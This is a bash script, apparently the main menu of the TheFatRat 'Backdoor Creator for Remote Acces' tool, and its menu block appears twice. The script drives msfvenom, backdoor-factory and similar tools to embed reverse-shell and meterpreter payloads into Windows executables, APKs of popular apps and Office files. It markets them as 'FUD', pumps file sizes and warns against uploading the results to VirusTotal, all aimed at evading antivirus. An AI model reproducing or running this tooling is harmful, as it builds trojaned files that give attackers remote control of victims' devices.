-e $white "Special thanks to:" echo echo -e $red "Dracos Linux ( www.dracos-linux.org )" echo echo -e $red "Offensive Security for the awesome OS" echo echo -e $green "http://www.offensive-security.com/" echo echo -e $yellow "http://www.kali.org/" echo echo -e $cyan "http://www.kitploit.com/" echo echo -e $white "http://www.linuxsec.org/" echo echo -e $red "Big Thanks to : http://www.github.com/" echo } ################################################################### # MENU FATRAT ################################################################### menu () { clear resize -s 46 76 > /dev/null echo -e $okegreen"" echo -e $okegreen" ____ " echo -e $okegreen" | | " echo -e $okegreen" |____| " echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ " echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ " echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| " echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| " echo -e $okegreen" J \.|'.\/ \ " echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] " echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] " echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Version: $red"$Versi" $white[$okegreen--$white] " echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: $red"$codename" $white[$okegreen--$white] " echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] " echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Dracos Linux : $red@dracos-linux.org $white[$okegreen--$white] " echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] " echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] " echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] " echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ " echo echo -e $white " " echo -e $white" [$okegreen"01"$white]$okegreen Create Backdoor with msfvenom" echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor [Slow but Powerfull] " echo -e $white" [$okegreen"03"$white]$okegreen Create Fud Backdoor with Avoid v1.2 " echo -e $white" [$okegreen"04"$white]$okegreen Create Fud Backdoor with backdoor-factory [embed] " echo -e $white" [$okegreen"05"$white]$okegreen Backdooring Original apk [Instagram, Line,etc] " echo -e $white" [$okegreen"06"$white]$okegreen Create Fud Backdoor 1000% with PwnWinds [Excelent] " echo -e $white" [$okegreen"07"$white]$okegreen Create Backdoor For Office with Microsploit " echo -e $white" [$okegreen"08"$white]$okegreen Create auto listeners " echo -e $white" [$okegreen"09"$white]$okegreen Jump to msfconsole " echo -e $white" [$okegreen"10"$white]$okegreen Searchsploit " echo -e $white" [$okegreen"11"$white]$okegreen File Pumper [Increase Your Files Size] " echo -e $white" [$okegreen"12"$white]$okegreen Cleanup " echo -e $white" [$okegreen"13"$white]$okegreen Help " echo -e $white" [$okegreen"14"$white]$okegreen Credits " echo -e $white" [$okegreen"15"$white]$okegreen Exit " echo -e " " echo -n -e $red' \033[4mScreetsec@Fatrat:\033[0m '; tput sgr0 #insert your choice read fatrat if test $fatrat == '1' then cmsfvenom elif test $fatrat == '2' then chmod +x powerfull.sh xterm -fa monaco -fs 13 -bg black ./powerfull.sh elif test $fatrat == '3' then avoid elif test $fatrat == '4' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira; embed=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your executable file"); payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "cave_miner_inline" FALSE "iat_reverse_tcp_inline" FALSE "iat_reverse_tcp_inline_threaded" FALSE "iat_reverse_tcp_stager_threaded" FALSE "iat_user_supplied_shellcode_threaded" FALSE "meterpreter_reverse_https_threaded" FALSE "reverse_shell_tcp_inline" FALSE "reverse_tcp_stager_threaded" FALSE "user_supplied_shellcode_threaded" --width 350 --height 300) > /dev/null 2>&1 spinlong if [ ! -f "$embed" ];then echo -e $red "You did not setected any executable file" read -ne " Press any key to return to menu ." menu fi echo "" echo "" gboor spinlong2 echo "" echo -e $okegreen"" $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press any key to continue" read bebeku clear menu elif test $fatrat == '5' then embedapk elif test $fatrat == '6' then PwnWinds elif test $fatrat == '7' then microsploit elif test $fatrat == '8' then clisteners elif test $fatrat == '9' then xterm -fa monaco -fs 13 -bg black -e "$msfconsole" elif test $fatrat == '10' then clear echo -e "\033[31mWhat do you want to Hack Today?\033[m" echo -e "\033[31mEnter a search term and hit Enter\033[m" read searchterm gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "$searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2 menu elif test $fatrat == '11' then echo echo -ne $okegreen " Located file (example:/output/backdoor.apk) :" ;tput sgr0 read tampfile echo echo -ne $okegreen" Size file for tamper (1000 for kb) (1 for mb ) : " ;tput sgr0 read size echo echo -ne $okegreen" mb or kb : " ;tput sgr0 read type python $pump $tampfile $size -$type > /dev/null 2>&1 echo echo -ne $yellow" Finished Pumping ... " read oke menu elif test $fatrat == '12' then echo "" echo -ne $red" [>] $cyan Are you sure you want to clean payload folders? [y/N] : " read clean if [ $clean == "y" ] ; then echo "" else clear exit fi echo -e $red" [*] $cyan Cleaning /TheFatRat/temp/" cd temp rm *.rc >/dev/null 2>&1 cd .. sleep 2 echo "" echo -e $red" [*] $cyan Cleaning /TheFatRat/autorun/" cd autorun rm * >/dev/null 2>&1 cd .. sleep 2 echo "" echo -e $red" [*] $cyan Cleaning /TheFatRat/output/" cd output rm * >/dev/null 2>&1 cd .. sleep 2 echo "" echo -e $red" [*] $cyan Cleaning /TheFatRat/*.exe or apk" rm *.exe *.apk >/dev/null 2>&1 sleep 2 echo "" echo -e $red" [*] $cyan Cleaning /TheFatRat/backdoored/output/" cd backdoored/output rm * >/dev/null 2>&1 cd .. cd .. echo "" echo -ne $red" [*] $cyan Folders cleaned, press any key to return to the main menu." read anjeng menu elif test $fatrat == '13' then firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md elif test $fatrat == '14' then credits elif test $fatrat == '15' then Stop echo "" echo -e $okegreen" REMEMBER , DONT UPLOAD TO VIRUSTOTAL !!" echo "" read -p " Press [Enter] key to Exit..." sleep 2 clear exit else echo -e " Incorrect Number" fi echo -n -e " Do you want exit? ( Yes / No ) :" read back if [ $back != 'n' ] && [ $back != 'N' ] then clear exit elif [ $back != 'y' ] && [ $back != 'Y' ] then menu fi } ################################################################### # MENU FATRAT ################################################################### clear resize -s 46 76 > /dev/null echo -e $okegreen"" echo -e $okegreen" ____ " echo -e $okegreen" | | " echo -e $okegreen" |____| " echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ " echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ " echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| " echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| " echo -e $okegreen" J \.|'.\/ \ " echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] " echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] " echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Version: $red"$Versi" $white[$okegreen--$white] " echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: $red"$codename" $white[$okegreen--$white] " echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] " echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Dracos Linux : $red@dracos-linux.org $white[$okegreen--$white] " echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] " echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] " echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] " echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ " echo echo -e $white " " echo -e $white" [$okegreen"01"$white]$okegreen Create Backdoor with msfvenom" echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor [Slow but Powerfull] " echo -e $white" [$okegreen"03"$white]$okegreen Create Fud Backdoor with Avoid v1.2 " echo -e $white" [$okegreen"04"$white]$okegreen Create Fud Backdoor with backdoor-factory [embed] " echo -e $white" [$okegreen"05"$white]$okegreen Backdooring Original apk [Instagram, Line,etc] " echo -e $white" [$okegreen"06"$white]$okegreen Create Fud Backdoor 1000% with PwnWinds [Excelent] " echo -e $white" [$okegreen"07"$white]$okegreen Create Backdoor For Office with Microsploit " echo -e $white" [$okegreen"08"$white]$okegreen Create auto listeners " echo -e $white" [$okegreen"09"$white]$okegreen Jump to msfconsole " echo -e $white" [$okegreen"10"$white]$okegreen Searchsploit " echo -e $white" [$okegreen"11"$white]$okegreen File Pumper [Increase Your Files Size] " echo -e $white" [$okegreen"12"$white]$okegreen Cleanup " echo -e $white" [$okegreen"13"$white]$okegreen Help " echo -e $white" [$okegreen"14"$white]$okegreen Credits " echo -e $white" [$okegreen"15"$white]$okegreen Exit " echo -e " " echo -n -e $red' \033[4mScreetsec@Fatrat:\033[0m '; tput sgr0 #insert your choice read fatrat if test $fatrat == '1' then cmsfvenom elif test $fatrat == '2' then chmod +x powerfull.sh xterm -fa monaco -fs 13 -bg black ./powerfull.sh elif test $fatrat == '3' then avoid elif test $fatrat == '4' then echo "" spinlong echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira; embed=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your executable file"); payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "cave_miner_inline" FALSE "iat_reverse_tcp_inline" FALSE "iat_reverse_tcp_inline_threaded" FALSE "iat_reverse_tcp_stager_threaded" FALSE "iat_user_supplied_shellcode_threaded" FALSE "meterpreter_reverse_https_threaded" FALSE "reverse_shell_tcp_inline" FALSE "reverse_tcp_stager_threaded" FALSE "user_supplied_shellcode_threaded" --width 350 --height 300) > /dev/null 2>&1 spinlong if [ ! -f "$embed" ];then echo -e $red "You did not setected any executable file" read -ne " Press any key to return to menu ." menu fi echo "" echo "" gboor spinlong2 echo "" echo -e $okegreen"" $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press any key to continue" read bebeku clear menu elif test $fatrat == '5' then embedapk elif test $fatrat == '6' then PwnWinds elif test $fatrat == '7' then microsploit elif test $fatrat == '8' then clisteners elif test $fatrat == '9' then xterm -fa monaco -fs 13 -bg black -e "$msfconsole" elif test $fatrat == '10' then clear echo -e "\033[31mWhat do you want to Hack Today?\033[m" echo -e "\033[31mEnter a search term and hit Enter\033[m" read searchterm gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "$searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2 menu elif test $fatrat == '11' then echo echo -ne $okegreen " Located file (example:/output/backdoor.apk) :" ;tput sgr0 read tampfile echo echo -ne $okegreen" Size file for tamper (1000 for kb) (1 for mb ) : " ;tput sgr0 read size echo echo -ne $okegreen" mb or kb : " ;tput sgr0 read type python $pump $tampfile $size -$type > /dev/null 2>&1 echo echo -ne $yellow" Finished Pumping ... " read oke menu elif test $fatrat == '12' then echo "" echo -ne $red" [>] $cyan Are you sure you want to clean payload folders? [y/N] : " read clean if [ $clean == "y" ] ; then echo "" else clear exit fi echo -e $red" [*] $cyan Cleaning /TheFatRat/temp/" cd temp rm *.rc >/dev/null 2>&1 cd .. sleep 2 echo "" echo -e $red" [*] $cyan Cleaning /TheFatRat/autorun/" cd autorun rm * >/dev/null 2>&1 cd .. sleep 2 echo "" echo -e $red" [*] $cyan Cleaning /TheFatRat/output/" cd output rm * >/dev/null 2>&1 cd .. sleep 2 echo "" echo -e $red" [*] $cyan Cleaning /TheFatRat/*.exe or apk" rm *.exe *.apk >/dev/null 2>&1 sleep 2 echo "" echo -e $red" [*] $cyan Cleaning /TheFatRat/backdoored/output/" cd backdoored/output rm * >/dev/null 2>&1 cd .. cd .. echo "" echo -ne $red" [*] $cyan Folders cleaned, press any key to return to the main menu." read anjeng menu elif test $fatrat == '13' then firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md elif test $fatrat == '14' then credits elif test $fatrat == '15' then Stop echo "" echo -e $okegreen" REMEMBER , DONT UPLOAD TO VIRUSTOTAL !!" echo "" read -p " Press [Enter] key to Exit..." sleep 2 clear exit else echo -e " Incorrect Number" fi echo -n -e " Do you want exit? ( Yes / No ) :" read back if [ $back != 'n' ] && [ $back != 'N' ] then clear exit elif [ $back != 'y' ] && [ $back != 'Y' ] then menu fi